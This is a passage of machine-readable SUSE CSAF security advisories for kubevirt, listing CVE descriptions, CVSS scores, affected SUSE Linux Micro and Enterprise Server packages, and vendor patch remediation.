"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:49:48Z",
"details": "moderate"
}
],
"title": "CVE-2025-64435"
},
{
"cve": "CVE-2025-64437",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64437"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. In versions before 1.5.3 and 1.6.1, the virt-handler does not verify whether the launcher-sock is a symlink or a regular file. This oversight can be exploited, for example, to change the ownership of arbitrary files on the host node to the unprivileged user with UID 107 (the same user used by virt-launcher) thus, compromising the CIA (Confidentiality, Integrity and Availability) of data on the host. To successfully exploit this vulnerability, an attacker should be in control of the file system of the virt-launcher pod. This vulnerability is fixed in 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64437",
"url": "https://www.suse.com/security/cve/CVE-2025-64437"
},
{
"category": "external",
"summary": "SUSE Bug 1253194 for CVE-2025-64437",
"url": "https://bugzilla.suse.com/1253194"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.9,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:49:48Z",
"details": "low"
}
],
"title": "CVE-2025-64437"
}
]
}
SUSE-SU-2026:20551-1
Vulnerability from csaf_suse - Published: 2026-02-27 08:49 - Updated: 2026-02-27 08:49Summary
Security update for kubevirt
Notes
Title of the patch
Security update for kubevirt
Description of the patch
This update for kubevirt fixes the following issues:
Update to version 1.7.0 (bsc#1257128).
Security issues fixed:
- CVE-2025-64435: logic flaw in the virt-controller can lead to incorrect status updates and potentially causing a DoS
(bsc#1253189).
- CVE-2024-45310: kubevirt vendored github.com/opencontainers/runc/libcontainer/utils: runc can be tricked into
creating empty files/directories on host (bsc#1257422).
- CVE-2025-22872: incorrectly interpreted tags can cause content to be placed wrong scope during DOM construction
(bsc#1241772).
- CVE-2025-64432: fail to correctly validate certain fields in the client TLS certificate may allow an attacker to
bypass existing RBAC controls (bsc#1253181).
- CVE-2025-64433: improper symlink handling can allow to read arbitrary files (bsc#1253185).
- CVE-2025-64434: compromising virt-handler instance can lead to impersonate virt-api and execute privileged operations
(bsc#1253186).
- CVE-2025-64437: mishandling of symlinks can lead to compromising the CIA (bsc#1253194).
- CVE-2025-64324: a logic bug that allows an attacker to read and write arbitrary files owned by more privileged users
(bsc#1253748).
Other updates and bugfixes:
- Upstream now uses stateless firmware for CoCo VMs.
Patchnames
SUSE-SL-Micro-6.2-319
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for kubevirt",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for kubevirt fixes the following issues:\n\nUpdate to version 1.7.0 (bsc#1257128).\n\nSecurity issues fixed:\n\n - CVE-2025-64435: logic flaw in the virt-controller can lead to incorrect status updates and potentially causing a DoS\n (bsc#1253189).\n - CVE-2024-45310: kubevirt vendored github.com/opencontainers/runc/libcontainer/utils: runc can be tricked into\n creating empty files/directories on host (bsc#1257422).\n - CVE-2025-22872: incorrectly interpreted tags can cause content to be placed wrong scope during DOM construction\n (bsc#1241772).\n - CVE-2025-64432: fail to correctly validate certain fields in the client TLS certificate may allow an attacker to\n bypass existing RBAC controls (bsc#1253181).\n - CVE-2025-64433: improper symlink handling can allow to read arbitrary files (bsc#1253185).\n - CVE-2025-64434: compromising virt-handler instance can lead to impersonate virt-api and execute privileged operations\n (bsc#1253186).\n - CVE-2025-64437: mishandling of symlinks can lead to compromising the CIA (bsc#1253194).\n - CVE-2025-64324: a logic bug that allows an attacker to read and write arbitrary files owned by more privileged users\n (bsc#1253748).\n\nOther updates and bugfixes:\n\n - Upstream now uses stateless firmware for CoCo VMs.\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-SL-Micro-6.2-319",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_20551-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:20551-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620551-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:20551-1",
"url": "https://lists.suse.com/pipermail/sle-updates/2026-March/044565.html"
},
{
"category": "self",
"summary": "SUSE Bug 1241772",
"url": "https://bugzilla.suse.com/1241772"
},
{
"category": "self",
"summary": "SUSE Bug 1253181",
"url": "https://bugzilla.suse.com/1253181"
},
{
"category": "self",
"summary": "SUSE Bug 1253185",
"url": "https://bugzilla.suse.com/1253185"
},
{
"category": "self",
"summary": "SUSE Bug 1253186",
"url": "https://bugzilla.suse.com/1253186"
},
{
"category": "self",
"summary": "SUSE Bug 1253189",
"url": "https://bugzilla.suse.com/1253189"
},
{
"category": "self",
"summary": "SUSE Bug 1253194",
"url": "https://bugzilla.suse.com/1253194"
},
{
"category": "self",
"summary": "SUSE Bug 1253748",
"url": "https://bugzilla.suse.com/1253748"
},
{
"category": "self",
"summary": "SUSE Bug 1257128",
"url": "https://bugzilla.suse.com/1257128"
},
{
"category": "self",
"summary": "SUSE Bug 1257422",
"url": "https://bugzilla.suse.com/1257422"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-45310 page",
"url": "https://www.suse.com/security/cve/CVE-2024-45310/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-22872 page",
"url": "https://www.suse.com/security/cve/CVE-2025-22872/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64324 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64324/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64432 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64432/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64433 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64433/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64434 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64434/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64435 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64435/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64437 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64437/"
}
],
"title": "Security update for kubevirt",
"tracking": {
"current_release_date": "2026-02-27T08:49:48Z",
"generator": {
"date": "2026-02-27T08:49:48Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:20551-1",
"initial_release_date": "2026-02-27T08:49:48Z",
"revision_history": [
{
"date": "2026-02-27T08:49:48Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-manifests-1.7.0-160000.1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Micro 6.2",
"product": {
"name": "SUSE Linux Micro 6.2",
"product_id": "SUSE Linux Micro 6.2",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles:16:16.0:transactional"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-manifests-1.7.0-160000.1.1.x86_64 as component of SUSE Linux Micro 6.2",
"product_id": "SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "SUSE Linux Micro 6.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64 as component of SUSE Linux Micro 6.2",
"product_id": "SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "SUSE Linux Micro 6.2"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-45310",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-45310"
}
],
"notes": [
{
"category": "general",
"text": "runc is a CLI tool for spawning and running containers according to the OCI specification. runc 1.1.13 and earlier, as well as 1.2.0-rc2 and earlier, can be tricked into creating empty files or directories in arbitrary locations in the host filesystem by sharing a volume between two containers and exploiting a race with `os.MkdirAll`. While this could be used to create empty files, existing files would not be truncated. An attacker must have the ability to start containers using some kind of custom volume configuration. Containers using user namespaces are still affected, but the scope of places an attacker can create inodes can be significantly reduced. Sufficiently strict LSM policies (SELinux/Apparmor) can also in principle block this attack -- we suspect the industry standard SELinux policy may restrict this attack\u0027s scope but the exact scope of protection hasn\u0027t been analysed. This is exploitable using runc directly as well as through Docker and Kubernetes. The issue is fixed in runc v1.1.14 and v1.2.0-rc3.\n\nSome workarounds are available. Using user namespaces restricts this attack fairly significantly such that the attacker can only create inodes in directories that the remapped root user/group has write access to. Unless the root user is remapped to an actual\nuser on the host (such as with rootless containers that don\u0027t use `/etc/sub[ug]id`), this in practice means that an attacker would only be able to create inodes in world-writable directories. A strict enough SELinux or AppArmor policy could in principle also restrict the scope if a specific label is applied to the runc runtime, though neither the extent to which the standard existing policies block this attack nor what exact policies are needed to sufficiently restrict this attack have been thoroughly tested.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-45310",
"url": "https://www.suse.com/security/cve/CVE-2024-45310"
},
{
"category": "external",
"summary": "SUSE Bug 1230092 for CVE-2024-45310",
"url": "https://bugzilla.suse.com/1230092"
},
{
"category": "external",
"summary": "SUSE Bug 1257413 for CVE-2024-45310",
"url": "https://bugzilla.suse.com/1257413"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.6,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:49:48Z",
"details": "low"
}
],
"title": "CVE-2024-45310"
},
{
"cve": "CVE-2025-22872",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-22872"
}
],
"notes": [
{
"category": "general",
"text": "The tokenizer incorrectly interprets tags with unquoted attribute values that end with a solidus character (/) as self-closing. When directly using Tokenizer, this can result in such tags incorrectly being marked as self-closing, and when using the Parse functions, this can result in content following such tags as being placed in the wrong scope during DOM construction, but only when tags are in foreign content (e.g. \u003cmath\u003e, \u003csvg\u003e, etc contexts).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-22872",
"url": "https://www.suse.com/security/cve/CVE-2025-22872"
},
{
"category": "external",
"summary": "SUSE Bug 1241710 for CVE-2025-22872",
"url": "https://bugzilla.suse.com/1241710"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:49:48Z",
"details": "moderate"
}
],
"title": "CVE-2025-22872"
},
{
"cve": "CVE-2025-64324",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64324"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. The `hostDisk` feature in KubeVirt allows mounting a host file or directory owned by the user with UID 107 into a VM. However, prior to version 1.6.1 and 1.7.0, the implementation of this feature and more specifically the `DiskOrCreate` option (which creates a file if it doesn\u0027t exist) has a logic bug that allows an attacker to read and write arbitrary files owned by more privileged users on the host system. Versions 1.6.1 and 1.7.0 fix the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64324",
"url": "https://www.suse.com/security/cve/CVE-2025-64324"
},
{
"category": "external",
"summary": "SUSE Bug 1253748 for CVE-2025-64324",
"url": "https://bugzilla.suse.com/1253748"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:49:48Z",
"details": "important"
}
],
"title": "CVE-2025-64324"
},
{
"cve": "CVE-2025-64432",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64432"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Versions 1.5.3 and below, and 1.6.0 contained a flawed implementation of the Kubernetes aggregation layer\u0027s authentication flow which could enable bypass of RBAC controls. It was discovered that the virt-api component fails to correctly authenticate the client when receiving API requests over mTLS. In particular, it fails to validate the CN (Common Name) field in the received client TLS certificates against the set of allowed values defined in the extension-apiserver-authentication configmap. Failre to validate certain fields in the client TLS certificate may allow an attacker to bypass existing RBAC controls by directly communicating with the aggregated API server, impersonating the Kubernetes API server and its aggregator component. This issue is fixed in versions 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64432",
"url": "https://www.suse.com/security/cve/CVE-2025-64432"
},
{
"category": "external",
"summary": "SUSE Bug 1253181 for CVE-2025-64432",
"url": "https://bugzilla.suse.com/1253181"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:49:48Z",
"details": "moderate"
}
],
"title": "CVE-2025-64432"
},
{
"cve": "CVE-2025-64433",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64433"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.5.3 and 1.6.1, a vulnerability was discovered that allows a VM to read arbitrary files from the virt-launcher pod\u0027s file system. This issue stems from improper symlink handling when mounting PVC disks into a VM. Specifically, if a malicious user has full or partial control over the contents of a PVC, they can create a symbolic link that points to a file within the virt-launcher pod\u0027s file system. Since libvirt can treat regular files as block devices, any file on the pod\u0027s file system that is symlinked in this way can be mounted into the VM and subsequently read. Although a security mechanism exists where VMs are executed as an unprivileged user with UID 107 inside the virt-launcher container, limiting the scope of accessible resources, this restriction is bypassed due to a second vulnerability. The latter causes the ownership of any file intended for mounting to be changed to the unprivileged user with UID 107 prior to mounting. As a result, an attacker can gain access to and read arbitrary files located within the virt-launcher pod\u0027s file system or on a mounted PVC from within the guest VM. This vulnerability is fixed in 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64433",
"url": "https://www.suse.com/security/cve/CVE-2025-64433"
},
{
"category": "external",
"summary": "SUSE Bug 1253185 for CVE-2025-64433",
"url": "https://bugzilla.suse.com/1253185"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:49:48Z",
"details": "moderate"
}
],
"title": "CVE-2025-64433"
},
{
"cve": "CVE-2025-64434",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64434"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.5.3 and 1.6.1, due to the peer verification logic in virt-handler (via verifyPeerCert), an attacker who compromises a virt-handler instance, could exploit these shared credentials to impersonate virt-api and execute privileged operations against other virt-handler instances potentially compromising the integrity and availability of the VM managed by it. This vulnerability is fixed in 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64434",
"url": "https://www.suse.com/security/cve/CVE-2025-64434"
},
{
"category": "external",
"summary": "SUSE Bug 1253186 for CVE-2025-64434",
"url": "https://bugzilla.suse.com/1253186"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:49:48Z",
"details": "moderate"
}
],
"title": "CVE-2025-64434"
},
{
"cve": "CVE-2025-64435",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64435"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.7.0-beta.0, a logic flaw in the virt-controller allows an attacker to disrupt the control over a running VMI by creating a pod with the same labels as the legitimate virt-launcher pod associated with the VMI. This can mislead the virt-controller into associating the fake pod with the VMI, resulting in incorrect status updates and potentially causing a DoS (Denial-of-Service). This vulnerability is fixed in 1.7.0-beta.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64435",
"url": "https://www.suse.com/security/cve/CVE-2025-64435"
},
{
"category": "external",
"summary": "SUSE Bug 1253189 for CVE-2025-64435",
"url": "https://bugzilla.suse.com/1253189"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:49:48Z",
"details": "moderate"
}
],
"title": "CVE-2025-64435"
},
{
"cve": "CVE-2025-64437",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64437"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. In versions before 1.5.3 and 1.6.1, the virt-handler does not verify whether the launcher-sock is a symlink or a regular file. This oversight can be exploited, for example, to change the ownership of arbitrary files on the host node to the unprivileged user with UID 107 (the same user used by virt-launcher) thus, compromising the CIA (Confidentiality, Integrity and Availability) of data on the host. To successfully exploit this vulnerability, an attacker should be in control of the file system of the virt-launcher pod. This vulnerability is fixed in 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64437",
"url": "https://www.suse.com/security/cve/CVE-2025-64437"
},
{
"category": "external",
"summary": "SUSE Bug 1253194 for CVE-2025-64437",
"url": "https://bugzilla.suse.com/1253194"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.9,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:49:48Z",
"details": "low"
}
],
"title": "CVE-2025-64437"
}
]
}
SUSE-SU-2025:4330-1
Vulnerability from csaf_suse - Published: 2025-12-09 11:33 - Updated: 2025-12-09 11:33Summary
Security update for kubevirt, virt-api-container, virt-controller-container, virt-exportproxy-container, virt-exportserver-container, virt-handler-container, virt-launcher-container, virt-libguestfs-tools-container, virt-operator-container, virt-pr-helper-container
Notes
Title of the patch
Security update for kubevirt, virt-api-container, virt-controller-container, virt-exportproxy-container, virt-exportserver-container, virt-handler-container, virt-launcher-container, virt-libguestfs-tools-container, virt-operator-container, virt-pr-helper-container
Description of the patch
This update for kubevirt, virt-api-container, virt-controller-container, virt-exportproxy-container, virt-exportserver-container, virt-handler-container, virt-launcher-container, virt-libguestfs-tools-container, virt-operator-container, virt-pr-helper-container fixes the following issues:
Updated kubevirt to version 1.6.3:
- CVE-2025-22872: Fixed incorrect interpretation of tags leading content to be placed wrong scope during DOM
construction in golang.org/x/net/html (bsc#1241772)
- CVE-2025-64432: Fixed bypass of RBAC controls due to incorrect validation of certain fields in the client
TLS certificate (bsc#1253181)
- CVE-2025-64433: Fixed arbitrary files read via improper symlink handling (bsc#1253185)
- CVE-2025-64434: Fixed privilege escalation via virt-api impersonification due to compromise virt-handler
instance (bsc#1253186)
- CVE-2025-64437: Fixed mishandling of symlinks (bsc#1253194)
- CVE-2025-64324: Fixed a logic bug that allows an attacker to read and write arbitrary files owned by more
privileged users (bsc#1253748)
Patchnames
SUSE-2025-4330,SUSE-SLE-Module-Containers-15-SP7-2025-4330
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
